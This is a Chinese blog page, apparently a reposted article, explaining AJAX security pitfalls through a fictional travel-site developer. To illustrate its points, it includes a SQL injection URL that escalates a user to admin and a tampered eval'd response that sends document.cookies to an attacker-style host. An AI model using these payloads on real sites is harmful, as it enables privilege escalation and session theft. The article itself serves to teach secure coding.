- 浏览: 179122 次
- 性别:
- 来自: 上海
文章分类
- 全部博客 (174)
- rails (25)
- js (15)
- ruby (30)
- webserver (5)
- mysql (13)
- security (5)
- thinking (5)
- common sense (2)
- linux (18)
- android (26)
- web browser (1)
- config and deploy (1)
- mac (5)
- css (2)
- db (8)
- version manager (1)
- editor (1)
- job (1)
- OOA (1)
- php (1)
- apache (2)
- mongrel (1)
- Mongodb (1)
- facebook (1)
- 架构 (1)
- 高并发 (1)
- twitter (1)
- Erlang (1)
- Scala (1)
- Lua (1)
- ubuntu (3)
- cache (1)
- 面试题 (2)
- android layout (2)
- android控件属性 (2)
- java (5)
- customize view (1)
- advanced (2)
- python (2)
- 机器学习 (5)
最新评论
Web开发者不会注意到由 “AJAX(Asynchronous JavaScript And XML)”所带来的激情。不费力气就能创建像Google Suggest那样的智能网站或者像Gmail那样基于Web的应用程序,这在很大程度上要归功于这种技术。然而,伴随着AJAX应用程序的发展,我们发 现了它的一些不足之处,我们发现它的安全漏洞也在逐渐变大,就像慢慢地把基于AJAX的站点放入了一颗定时zhadan中。
AJAX的好处
在当年“Web应用程序”的美好时代,事情非常简单。你填写了一个表单,点击“提交”按钮,然后当前屏幕就消失了,等待一小会儿后你就转入到了下一个页面。今天的状况已经不是这样的了,用户需要的是一种就像任何桌面应用程序那样流畅、快捷和人性化的Web体验。
AJAX经常是和DHTML(Dynamic HTML)一起协作的,它的顺利执行需要允许网页中的JavaScript代码和web服务器在后台无缝通讯。比方说,当你开始在Google Suggest的搜索框中输入东西时,web页面就和服务器在后台开始交换数据,然后会给出一些你可能需要的词条等。所有的这一切都不需要页面刷新或者按 下任何按钮。同样这也就是像Gmail那样的应用程序怎么能对实时拼写检查做的那么好的原因。
AJAX怎样工作
AJAX复杂的原理已经超出了今天所要阐述的范围,这里只简单描述一下。你的页面上的JavaScript代码能够在不依赖于用户的情况下和你的 Web服务器取得联系。这里面起核心作用的就是JavaScript的XMLHttpRequest对象,这个对象能够被就像用户敲击键盘或者时钟事件在 后台或者异步触发(也就是术语异步JavaScript和XML)。
如果你在Google Suggest中输入“ajax”后,就会得到像我输入后得到的服务器请求一样:
1. www.google.com/complete/search?hl=en&js=true&qu=aj
2. www.google.com/complete/search?hl=en&js=true&qu=aja
3. www.google.com/complete/search?hl=en&js=true&qu=ajax
在这个术语中的XML部分有一点会引起人们的误解,其实这一部分是没有任何意义的。它是从JavaScript对象得来的名字,同时许多 AJAX风格的应用程序使用了XML,这个对象能够就任何事务向服务器发出一个请求。甚至JavaScript代码本身也能够被取回和评估。继续完成我的 输入“ajax example”,将会从Google的服务器产生下面的回应:
sendRPCDone(frameElement, “ajax example”, new Array(”ajax example”, “ajax examples”), new Array(”153,000 results”, “177,000 results”), new Array(”"));
这将会给你一些关于强大的AJAX的暗示吧,它具有在运行中(on the fly)把新的JavaScript代码加入到浏览器中的能力。然而,最优化的方法看起来好像束缚了XML协定。举个例子说明一下,比如Google产生了下面的这个东西:
ajax example
153,000
ajax examples
177,000
显然,你可以在一个合适的表单中解释这些XML数据,但我们要感谢JavaScript,它确实能够在一些非常典型的限制条件下和大量讨厌的IE bug环境里非常好的处理XML对象。
为了帮助你理解一些Ajax的问题,我在这里给你介绍一个假想的旅行公司-“时代尖端旅行公司”。由于受到AJAX bug的推动,他们的主要web开发者Max Uptime为了创建一个这样的应用程序,他决定混合使用AJAX,这样,他走在时代尖端了。
AJAX的问题
半数以上的AJAX安全风险来自隐含在服务器中的漏洞。显然,使用安全编码技术的好的设计,对于更安全的AJAX大有帮助,我们需要感谢Max 熟悉开放万维网应用安全计划(the Open Web Application Security Project – OWASP)排名前十的最严重web应用程序安全漏洞列表(www.owasp.org )。不幸的是,当Max实现AJAX的时候,他仍然需要面对许多额外的因素:
1.新的技术:如果Max想把他的站点连接到一个SQL数据库,他在Google查到了数百万的例子。AJAX技术,不管这种技术有多年轻,它仍然 是出现在采购循环中相对较早的,尽管它只有很少一部分好的例子出现在网络上。为了解决一些难处理的和不必要的复杂问题,这就要求像Max那样的开发者去自 主开发。Max也就不得不编写服务器端和客户端的代码,创建他自己不太确定的协议(特别是对服务器响应来讲)。不管这些协议有多好,都将会及时表现在页面 上。
2.非传统方式的设计:AJAX有一点点不同于传统设计方式,因为这样的应用程序是半客户端半服务端的。在Max的例子里,他是唯一的开发者,所以 他为服务端和客户端都能够进行编码。在同一时间使用两种不同的语言(特别是在早期阶段)进行开发将会产生一些初级的编码错误,因为他要在两端来回跳跃,对 一端来讲非常好,但可能在另一端不能够胜任。即使Max有一个大的开发团队,安全编码责任也可能在服务端和客户端开发小组之间代码移交的时候发生问题。
3.太多的脚本语言:Max凭借他自己的聪明才智决定建立世界上最优秀的旅行登记工具。你从输入你现在的位置(通过邮政编码、电话区号或者 GPS等等)开始登记,这时候一个AJAX请求就会被立即发送来确定你确切的位置。从那时候开始,屏幕上就会填入你所有可以利用的旅行方式,这一切甚至都 是在你决定你想要去什么地方、你打算什么时候动身和你打算和谁一同去之前就完成的。
这个屏幕上的单元格和控件都充满了AJAX驱动,服务器端和客户端的脚本可能需要超过20个不同的服务器调用。你可以想像一个很小的个体服务器程 序,比如findairportsbylocation.aspx 或者 determinemaxbaggageallowancebyairline.php.
显而易见,如果没有Max的仔细计划(比如创建多功能的“重载”JavaScript函数和服务器脚本),每一次设计他都需要创建超过40个独立的 部分。更多的编程意味着会产生更多的错误和bug,意味着需要更多的时间去编写、管理、测试和更新代码。不仅如此,因为在客户端的 JavaScript代码中应用了大量的这种脚本,他们在正式的程序测试中也容易变得很健忘。
4.确定小部分的AJAX不会引起危害:这个站点是一个计划出行的站点,但是Max考虑的是它将立刻为你提供一个显示精确位置的卫星视图,并且把你 所要到达目的地的天气情况也提供给你。AJAX最大的诱惑之一看起来好像是直到最后一刻它还在进行其它的操作,就像一个讲解员在那里解说一样,为了 AJAX使用了AJAX。当Max开始尝试他的新想法时,他会逐渐尝试增加更多新的功能,完全忽视测试的需要。
5.不安全的通讯:每一个AJAX调用可能只回传很少数量的数据给客户端,但那些数据是私有的、保密的。Max可以编写一个便利的工具来对你的信用 卡号码进行数字校验,但是如果使用纯文本代替over SSL进行发送数据会怎样呢?这是一个显而易见的问题,但是当有许多例行程序需要考虑,特别是屏幕上其它99%的数据不是真正的机密数据时,很容易就会忽 视掉SSL的。
6.服务器端访问控制:使用JavaScript程序来触发AJAX经常会掩饰一些显而易见的编码错误,服务器端访问控制就是一个例子。假设Max想参考你上次游览的一个详细目的地来为你提供你中意的旅馆,他可能会是像下面这样:
showprevioushotels.aspx?userid=12345&destination=UK
这当然是非常好的,但是如果一个恶意用户把URL改成了如下所示该怎么办呢:
showprevioushotels.aspx?userid=12346&destination=%
他们会得到其他人最喜爱的旅馆吗?(注意:%在SQL语句中是通配符)。无疑,这是一个没有什么危害的例子,但是Max应该使用 session、cookie或者其它符号形式来确保数据能并且只能发送到正确的用户那里。它们可能仅仅是数据的一小部分,但它们可能就是最重要的一小部 分。
7.服务器端验证:实际上这里有两个问题。第一,AJAX控制经常被用来在用户最后提交到服务器之前的输入验证。这麻痹了Max,使Max有一种虚 假的安全感,原因是他建立了称作alloweddestinations.php的函数,根据用户的ID来决定他们能够到达的正确目的地。
因为这是一个服务器端的检查,当这个页面最后被提交的时候他不必再次为在服务器上做检查而烦恼,这里我们假定不会有恶意的用户暗中破坏从alloweddestinations.php的响应或者破坏对服务器最后的请求。
AJAX控制可以比用户自己更仔细验证用户的输入,但是他们还是经常在服务器上最后做一次验证。
AJAX验证的第二个问题就是控制本身会受到验证漏洞的影响。这里再次强调一下,URL通常是隐藏着的,所以也会经常忘掉它。举例说明一下,也许我可以使用SQL Injection来对刚才的脚本进行攻击,如下所示:
showprevioushostels.aspx?userid=’; update users set type=’admin’ where userid=12345;–
就会让我登录后具有系统管理员的权限。当然,如何取得那些表名(table)和字段名已经超出了本文讨论的范围,但是你已经了解这种情况了,不是吗?
8.客户端验证:我们已经知道在刚才的Google Suggest例子中,通过简单评测服务端的响应后动态创建和执行JavaScript函数是可行的。如果没有任何形式的验证(如果这样的话在客户端很难 保证可靠性和流畅性),客户端将仅仅简单执行服务器需要它完成的事情。
这样的话,由于真正的代码怎么执行的对于一个普通用户来讲是永远看不到的(也就是说你不能够“查看源文件”),于是潜在地为恶意的黑客们打开了一个 完全的攻击导向。如果服务器的响应持续不断地被捣乱(这种破坏行为可能是在Web服务器本身也可能是在数据传输过程中),这种攻击将很难被发现。
Max使用下面的响应在目的地网页上更新天气图标,他是用的函数是eval();函数:
updateWeatherIcon(’cloudy.gif’);
然而,恶意的cracker能够把这个函数变成下面的形式,这样要发现这种攻击就更加困难了:
updateWeatherIcon(’www.myhackingsite.ru/grab.aspx?c=’ + document.cookies); updateWeatherIcon(’cloudy.gif’);
我们现在能够在我们自己的服务器上跟踪每一个用户的session ID/cookie。
小结
毫无疑问,AJAX和AJAX-style技术都是通向web设计的光明大道。开发者可以在web上创造出以前从所未有的真正的“应用程序”,使用AJAX必须小心谨慎,这样才能够保证web站点的安全。
然而,最大的威胁之一,来自日益复杂的使用AJAX的客户端脚本和服务器端脚本。这些脚本被技术手段隐藏在了视线之外,使测试很不直观;同时,这种 新技术看起来也使web开发者忘掉了基本的好的编码方式。就像访问控制和输入校验这样的问题也不会消失,它们变得更多更复杂了。
发表评论
-
jquery的html方法里包含特殊字符的处理
2017-08-11 08:27 1662在使用jquery的html()方法时,有时候里面添加的h ... -
jquery editable
2016-11-17 22:00 524http://www.cnblogs.com/xiaoyao ... -
Custom dialog for data-confirm in Rails
2016-10-11 17:24 842Every Rails developers might ... -
Dynamically loading external JavaScript and CSS files
2015-06-04 14:15 545To load a .js or .css file dyn ... -
javaScript document对象详解
2015-06-04 13:05 653注:页面上元素name属性和JavaScript引用的名称必 ... -
js代码收藏
2015-06-04 12:56 468js对象转换成jquery对象: jQuery(d ... -
邮箱suggest
2015-06-04 12:35 575<!DOCTYPE html PUBLIC " ... -
Creating a 100% ajax CRUD using rails 3 and unobtrusive javascript
2014-12-29 22:29 760Creating the project and ... -
jQuery操作checkbox选择
2014-12-29 18:59 645<!DOCTYPE html PUBLIC &qu ... -
Rails 3.2 的 Ajax 向导
2014-12-29 18:50 498原文: http://chloerei.com/2012/0 ... -
ajax
2014-03-02 12:59 581http://www.w3school.com.cn/aja ... -
js源码
2014-02-28 18:53 410在github里搜javascript https://g ... -
Check & Uncheck checkboxes
2014-02-24 17:47 672google=>js select all htt ... -
jQuery api
2011-01-18 14:33 1012$(document).ready(function() ...
相关推荐
### AJAX也有安全隐患——深入探讨AJAX的安全性 随着互联网技术的不断发展,Web应用程序变得越来越复杂且功能强大。其中,AJAX(Asynchronous JavaScript and XML)技术因其能够实现无需页面刷新即可与服务器通信的...
**Ajax技术简介** ...开发者需要深入理解这些安全隐患,并采取相应的防护措施,以确保应用程序的安全性。同时,随着Web技术的不断发展,新的安全威胁也可能出现,持续关注并适应这些变化是保持Web应用安全的关键。
《AJAX安全技术》是一本为专业人士提供预防Ajax安全漏洞一手实践的入门指导书。...《AJAX安全技术》适合广大基于AJAX开发Web程序的开发人员参考学习,同时也可作为高等院校相关专业师生的参考用书。
- **安全性挑战:** 由于数据交换的隐蔽性,恶意攻击者可能利用Ajax进行跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等。 - **浏览器兼容性:** 不同浏览器对Ajax的支持程度不同,可能导致应用在某些环境下无法正常...
### 分析Ajax技术的安全性 #### 概述 随着互联网技术的发展,Ajax(Asynchronous JavaScript and XML)作为一种革新性的Web开发技术,自诞生以来就极大地改善了用户体验,使其更加接近于传统的桌面应用。Ajax的...
Ajax应用程序的安全隐患分析与防范.pdf
众所周知,Ajax具备变革互联网的潜力,但危险的新安全威胁同样随之而来。《AJAX安全技术》揭示Ajax...《AJAX安全技术》适合广大基于AJAX开发Web程序的开发人员参考学习,同时也可作为高等院校相关专业师生的参考用书。
根据提供的文件信息,我们可以推断出这份文档主要关注的是Ajax...通过以上这些措施的综合运用,可以有效提升Ajax应用的安全性,降低被攻击的风险。同时,对于开发者来说,持续关注最新的安全动态和技术也是十分必要的。
AJAX AJAX AJAX AJAX AJAX AJAX AJAX AJAX AJAX
5. Ajax 的优点和挑战:书籍讨论了 Ajax 的优点和挑战,包括 Ajax 的优点,如提高用户体验、减少服务器负载等,以及 Ajax 的挑战,如浏览器兼容性问题、安全性问题等。 6. Ajax 技术资源中心:本书提供了 Ajax 技术...
在"ASP.NET AJAX深入浅出系列课程(32):构建高安全性ASP.NET AJAX应用程序"中,我们将探讨如何在使用ASP.NET AJAX时确保应用程序的安全性,以防止恶意攻击和数据泄露。 1. **理解ASP.NET AJAX基础**:首先,我们...
- 安全性和性能优化 - 设计模式与最佳实践 **源码解析** 书中提供的源码涵盖了这些章节中的实例和示例,读者可以通过实际运行和修改代码来加深对Ajax的理解。这些源码通常会包括: - 用JavaScript创建和管理...
同时,由于减少了服务器和客户端之间的通信量,Ajax也有助于优化网站性能,减少网络延迟。 在实际开发过程中,开发者需要注意几个关键点: - **状态管理**:由于Ajax请求是异步的,开发者需要管理请求的状态,确保...
Ajax不是万能的,在适合的场合使用Ajax,才能充分发挥它的长处,改善系统性能和用户体验,绝不可以为了技术而滥用。
同时,良好的编程习惯,如模块化和异步编程,也能提高Ajax代码的可维护性和性能。 总之,Ajax是现代Web开发中的重要工具,它提升了网页的互动性和响应性。通过深入理解Ajax的基本原理和实践技巧,开发者可以构建出...
常见的AJAX框架有jQuery、AngularJS、Vue.js、React等。 在使用JSON和AJAX框架时,我们需要注意以下几点: 1. **数据格式化**:JSON格式规定了键值对的表示方式,如`{"key": "value"}`,确保数据在服务器和客户端...
- **安全性**:尽管Ajax提高了用户体验,但也可能暴露更多安全风险,如XSS(跨站脚本攻击)和CSRF(跨站请求伪造)。 ### 5. 应用场景 Ajax广泛应用于各种Web应用中,如: - 实时聊天系统:实时接收和发送消息。 ...